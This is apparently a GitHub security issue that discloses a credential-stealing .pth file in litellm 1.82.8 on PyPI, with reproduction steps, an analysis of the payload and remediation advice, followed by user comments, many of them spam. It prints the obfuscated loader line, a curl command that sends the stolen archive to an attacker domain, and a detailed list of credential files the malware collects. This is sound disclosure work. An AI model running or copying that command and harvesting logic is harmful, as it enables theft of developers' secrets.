Skip to content

[Security]: CRITICAL: Malicious litellm_init.pth in litellm 1.82.8 — credential stealer #24512

@isfinne

Description

@isfinne

[LITELLM TEAM] - For updates from the team, please see: #24518

[Security]: CRITICAL: Malicious litellm_init.pth in litellm 1.82.8 PyPI package — credential stealer

Summary

The litellm==1.82.8 wheel package on PyPI contains a malicious .pth file (litellm_init.pth, 34,628 bytes) that automatically executes a credential-stealing script every time the Python interpreter starts — no import litellm required.

This is a supply chain compromise. The malicious file is listed in the package's own RECORD:

litellm_init.pth,sha256=ceNa7wMJnNHy1kRnNCcwJaFjWX3pORLfMh7xGL8TUjg,34628

Reproduction

pip download litellm==1.82.8 --no-deps -d /tmp/check
python3 -c "
import zipfile, os
whl = '/tmp/check/' + [f for f in os.listdir('/tmp/check') if f.endswith('.whl')][0]
with zipfile.ZipFile(whl) as z:
    pth = [n for n in z.namelist() if n.endswith('.pth')]
    print('PTH files:', pth)
    for p in pth:
        print(z.read(p)[:300])
"

You will see litellm_init.pth containing:

import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('...'))"])

Malicious Behavior (full analysis)

The payload is double base64-encoded. When decoded, it performs the following:

Stage 1: Information Collection

The script collects sensitive data from the host system:

  • System info: hostname, whoami, uname -a, ip addr, ip route
  • Environment variables: printenv (captures all API keys, secrets, tokens)
  • SSH keys: ~/.ssh/id_rsa, ~/.ssh/id_ed25519, ~/.ssh/id_ecdsa, ~/.ssh/id_dsa, ~/.ssh/authorized_keys, ~/.ssh/known_hosts, ~/.ssh/config
  • Git credentials: ~/.gitconfig, ~/.git-credentials
  • AWS credentials: ~/.aws/credentials, ~/.aws/config, IMDS token + security credentials
  • Kubernetes secrets: ~/.kube/config, /etc/kubernetes/admin.conf, /etc/kubernetes/kubelet.conf, /etc/kubernetes/controller-manager.conf, /etc/kubernetes/scheduler.conf, service account tokens
  • GCP credentials: ~/.config/gcloud/application_default_credentials.json
  • Azure credentials: ~/.azure/
  • Docker configs: ~/.docker/config.json, /kaniko/.docker/config.json, /root/.docker/config.json
  • Package manager configs: ~/.npmrc, ~/.vault-token, ~/.netrc, ~/.lftprc, ~/.msmtprc, ~/.my.cnf, ~/.pgpass, ~/.mongorc.js
  • Shell history: ~/.bash_history, ~/.zsh_history, ~/.sh_history, ~/.mysql_history, ~/.psql_history, ~/.rediscli_history
  • Crypto wallets: ~/.bitcoin/, ~/.litecoin/, ~/.dogecoin/, ~/.zcash/, ~/.dashcore/, ~/.ripple/, ~/.bitmonero/, ~/.ethereum/keystore/, ~/.cardano/, ~/.config/solana/
  • SSL/TLS private keys: /etc/ssl/private/, Let's Encrypt .pem and .key files
  • CI/CD secrets: terraform.tfvars, .gitlab-ci.yml, .travis.yml, Jenkinsfile, .drone.yml, Anchor.toml, ansible.cfg
  • Database credentials: PostgreSQL, MySQL, Redis, LDAP config files
  • Webhook URLs: grep for Slack/Discord webhook URLs in env and config files

Stage 2: Encryption & Exfiltration

  1. Collected data is written to a temporary file
  2. A random 32-byte AES-256 session key is generated via openssl rand
  3. The collected data is encrypted with openssl enc -aes-256-cbc -pbkdf2
  4. The AES session key is encrypted with a hardcoded 4096-bit RSA public key via openssl pkeyutl -encrypt -pkeyopt rsa_padding_mode:oaep
  5. Both encrypted files are packed into tpcp.tar.gz
  6. The archive is exfiltrated via:
curl -s -o /dev/null -X POST \
  "https://models.litellm.cloud/" \
  -H "Content-Type: application/octet-stream" \
  -H "X-Filename: tpcp.tar.gz" \
  --data-binary @tpcp.tar.gz

Key Technical Details

  • Trigger mechanism: .pth files in site-packages/ are executed automatically by the Python interpreter on startup (see Python docs on .pth files). No import statement is needed.
  • Stealth: The payload is double base64-encoded, making it invisible to naive source code grep.
  • Exfiltration target: https://models.litellm.cloud/ — note the domain litellm.cloud (NOT litellm.ai, the official domain).
  • RSA public key (first 64 chars): MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAvahaZDo8mucujrT15ry+...

Impact

Anyone who installed litellm==1.82.8 via pip has had all environment variables, SSH keys, cloud credentials, and other secrets collected and sent to an attacker-controlled server.

This affects:

  • Local development machines
  • CI/CD pipelines
  • Docker containers
  • Production servers

Affected Version

  • Confirmed: litellm==1.82.8 (PyPI wheel litellm-1.82.8-py3-none-any.whl)
  • Other versions: Not yet checked — the attacker may have compromised multiple releases

Recommended Actions

  1. PyPI: Yank/remove litellm 1.82.8 immediately
  2. Users: Check for litellm_init.pth in your site-packages/ directory
  3. Users: Rotate ALL credentials that were present as environment variables or in config files on any system where litellm 1.82.8 was installed
  4. BerriAI: Audit PyPI publishing credentials and CI/CD pipeline for compromise

Environment

  • OS: Ubuntu 24.04 (Docker container)
  • Python: 3.13
  • pip installed from PyPI
  • Discovered: 2026-03-24

Activity

hnykda

hnykda commented on Mar 24, 2026

@hnykda

Yep, we have been pwned by this. @krrishdholakia this is very, very bad, thousands of people are likely getting pwned right now.

Update (2026-03-24 23:47 UTC): My awesome colleague Callum McMahon, who discovered this, wrote an explainer and postmortem going into greater detail: https://futuresearch.ai/blog/no-prompt-injection-required

treo

treo commented on Mar 24, 2026

@treo

Version 1.82.7 is also compromised. It doesn't have the pth file, but the payload is still in proxy/proxy_server.py.

praiitt

praiitt commented on Mar 24, 2026

@praiitt

Thanks, that helped!

praiitt

praiitt commented on Mar 24, 2026

@praiitt

This was the answer I was looking for.

Hancie123

Hancie123 commented on Mar 24, 2026

@Hancie123

Worked like a charm, much appreciated.

Christopher933

Christopher933 commented on Mar 24, 2026

@Christopher933

Thanks for the tip!

mahesh-sini

mahesh-sini commented on Mar 24, 2026

@mahesh-sini

Great explanation, thanks for sharing.

bercanozcan

bercanozcan commented on Mar 24, 2026

@bercanozcan

This was the answer I was looking for.

18pixels

18pixels commented on Mar 24, 2026

@18pixels

Thanks for the tip!

Balerionth

Balerionth commented on Mar 24, 2026

@Balerionth

Great explanation, thanks for sharing.

sanchir2011

sanchir2011 commented on Mar 24, 2026

@sanchir2011

Great explanation, thanks for sharing.

bwanakweli4ever

bwanakweli4ever commented on Mar 24, 2026

@bwanakweli4ever

Great explanation, thanks for sharing.

piyushwebexpert

piyushwebexpert commented on Mar 24, 2026

@piyushwebexpert

Thanks, that helped!

561 remaining items

AsteriskZuo

AsteriskZuo commented on Mar 25, 2026

@AsteriskZuo

I created a tool that can scan locally to see if there is a problem version of the library. https://github.com/AsteriskZuo/scan-litellm-safely

noma4i

noma4i commented on Mar 25, 2026

@noma4i

"This incident is a huge wake-up call for all of us using LLM APIs. Thanks for the heads up! Inspired by this, I built a tiny, zero-dependency Python tool called KeySentry to help developers quickly scan their local projects for hardcoded keys and fix their .gitignore files. If anyone wants to do a quick security 'health check' on their local environment, feel free to use it: [https://github.com/daaimengermengzhu/KeySentry】 Stay safe, everyone!"

Another day another wave of AI sloppers on the march

exil0867

exil0867 commented on Mar 25, 2026

@exil0867

People advertising repos they vibe coded just hours ago in a supply-chain incident thread… clown behavior. Please report these bots.

SerJaimeLannister

SerJaimeLannister commented on Mar 25, 2026

@SerJaimeLannister

daaimengermengzhu
noshenxian

AsteriskZuo
ashishb

These user accounts are all either bots or promoting their own project for the most part

Combine this with the list at https://web.archive.org/web/20260324175657/https://notebin.de/?5758f85a6bb1f445#GrM2perfSSkNdDzUe9hiAKpk3cpNnCcQWQJaj5jo7xk4 for an combined list of now 125 commentors

@exil0867 I agree that we should report these bots and hopefully the contributors can remove their comments.

Update: I have actually used the list of all usernames and have uploaded this discussion and removed many spam comments and I am gonna update the list to be more accurate (I hope that there are no false positives)

This is the link to this discussion but I have removed most spam* comments

https://web.archive.org/web/20260325054202/https://serjaimelannister.github.io/litellm-comments/

I hope that this may help save some security researcher's/people's time reading the discussion from all this spam until contributors manually remove all the spam comments

priyanshusingh2023

priyanshusingh2023 commented on Mar 25, 2026

@priyanshusingh2023

Thank you for raising the issue

rosaboyle

rosaboyle commented on Mar 25, 2026

@rosaboyle

Can't believe the fucking bots diluting the comments

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Metadata

Metadata

Assignees

No one assigned

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

      Development

      No branches or pull requests

        Participants

        @mj6uc@tedivm@Nayjest@olivierverdier@noma4i

        Issue actions